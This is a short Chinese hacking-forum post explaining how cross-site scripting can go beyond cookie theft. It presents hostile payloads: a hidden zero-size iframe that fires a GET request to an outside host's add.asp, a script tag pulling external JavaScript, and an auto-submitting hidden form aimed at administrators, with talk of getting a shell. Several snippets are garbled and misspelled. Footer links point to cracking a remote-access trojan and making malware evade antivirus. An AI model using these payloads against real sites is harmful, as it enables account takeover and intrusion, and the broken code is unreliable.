真是鸡肋问题吗?其实跨站不仅仅是偷COOKIES那么简单!看看GET和POST两种提交(允许外部提交情况)看看以下
代码(GET):<
rame src="http://www.20nt.net/add.asp?pass=bin&pass=bin"width="0" height="0" frameborder="0">
</
rame>如果长度有限制
话可以这写:<Script url=http://www.20nt.net/bin.js></Script>
js完全可以是外部
! 至于POST
思路方法我想大家也应该能想到:<
rame src="http://www.20nt.net/bin.htm" width="0" height="0" frameborder="0"></rame>我们在bin.htm可以做
个表单,在表单尾部加上:<Scriptlanguage="javascript">this.doctument.form[0].submin
</Script>当管理员访问到跨站代码
时候就会实现表单内容.我想如果可以构造很好话甚至可以直接得到shell!如果大家想出了更好
思路方法可以写出来起讨论篇文章: 完全破解灰鸽子成为会员篇文章: 修改pcsharesys文件免杀在线动画教程
最新评论